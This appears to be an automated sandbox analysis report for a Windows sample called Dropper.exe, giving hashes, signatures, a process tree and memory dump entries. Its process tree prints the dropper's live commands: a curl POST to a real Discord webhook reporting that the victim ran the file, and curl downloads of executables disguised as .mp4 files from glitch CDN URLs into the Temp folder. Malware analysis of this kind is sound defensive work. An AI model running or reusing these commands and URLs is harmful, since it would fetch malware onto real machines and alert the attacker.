Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
22-06-2024 08:16
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
Dropper.exe
Resource
win7-20240221-en
2 signatures
150 seconds
Behavioral task
behavioral2
Sample
Dropper.exe
Resource
win10v2004-20240611-en
27 signatures
150 seconds
General
-
Target
Dropper.exe
-
Size
12KB
-
MD5
13eb5be5584766a9f95d058b74c01fae
-
SHA1
859b917932b9ce6610a5eb90c315cfd4f728f200
-
SHA256
58d82fcd47e89b187c3d6aa5ab70d5ea876968d223490ac1b3b24e4c71715292
-
SHA512
ea1fc5c2c8b0194863b8bf68a4d432b269ac666bcd6d8dd65b1e2d5e4e1926ccc9b013e42f39f100b99ba106253d85c33d1ac6ec89d51f8023b73444fa3a5a6e
-
SSDEEP
384:pHPELyODmB7q9bJnz6PbQGw+pfolHfhhDd4VCsw:1EmO6s9bJMbK/hhDawsw
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
Dropper.exeDropper.exedescription pid process target process PID 1312 wrote to memory of 2640 1312 Dropper.exe Dropper.exe PID 1312 wrote to memory of 2640 1312 Dropper.exe Dropper.exe PID 1312 wrote to memory of 2640 1312 Dropper.exe Dropper.exe PID 1312 wrote to memory of 2640 1312 Dropper.exe Dropper.exe PID 2640 wrote to memory of 2592 2640 Dropper.exe cmd.exe PID 2640 wrote to memory of 2592 2640 Dropper.exe cmd.exe PID 2640 wrote to memory of 2592 2640 Dropper.exe cmd.exe PID 2640 wrote to memory of 2592 2640 Dropper.exe cmd.exe PID 2640 wrote to memory of 2664 2640 Dropper.exe cmd.exe PID 2640 wrote to memory of 2664 2640 Dropper.exe cmd.exe PID 2640 wrote to memory of 2664 2640 Dropper.exe cmd.exe PID 2640 wrote to memory of 2664 2640 Dropper.exe cmd.exe PID 2640 wrote to memory of 2792 2640 Dropper.exe cmd.exe PID 2640 wrote to memory of 2792 2640 Dropper.exe cmd.exe PID 2640 wrote to memory of 2792 2640 Dropper.exe cmd.exe PID 2640 wrote to memory of 2792 2640 Dropper.exe cmd.exe PID 2640 wrote to memory of 2556 2640 Dropper.exe cmd.exe PID 2640 wrote to memory of 2556 2640 Dropper.exe cmd.exe PID 2640 wrote to memory of 2556 2640 Dropper.exe cmd.exe PID 2640 wrote to memory of 2556 2640 Dropper.exe cmd.exe PID 2640 wrote to memory of 2720 2640 Dropper.exe cmd.exe PID 2640 wrote to memory of 2720 2640 Dropper.exe cmd.exe PID 2640 wrote to memory of 2720 2640 Dropper.exe cmd.exe PID 2640 wrote to memory of 2720 2640 Dropper.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Dropper.exe"C:\Users\Admin\AppData\Local\Temp\Dropper.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Dropper.exe"C:\Users\Admin\AppData\Local\Temp\Dropper.exe" --restarted2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253986586673283103/CvnAbLIiYSc2d4NdsSOOo_z4TsnJT2JyuZLeKUKi_ejCvAa0imwn4KDGeajcvxpgCrSn" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/%2477-penisware2.mp4?v=1719043121460 --output C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Install.mp4?v=1719043283499 --output C:\Users\Admin\AppData\Local\Temp\$77-install.exe3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1312-0-0x000000007436E000-0x000000007436F000-memory.dmpFilesize
4KB
-
memory/1312-1-0x0000000001070000-0x000000000107A000-memory.dmpFilesize
40KB
-
memory/2640-2-0x00000000742E0000-0x00000000749CE000-memory.dmpFilesize
6.9MB
-
memory/2640-3-0x00000000742E0000-0x00000000749CE000-memory.dmpFilesize
6.9MB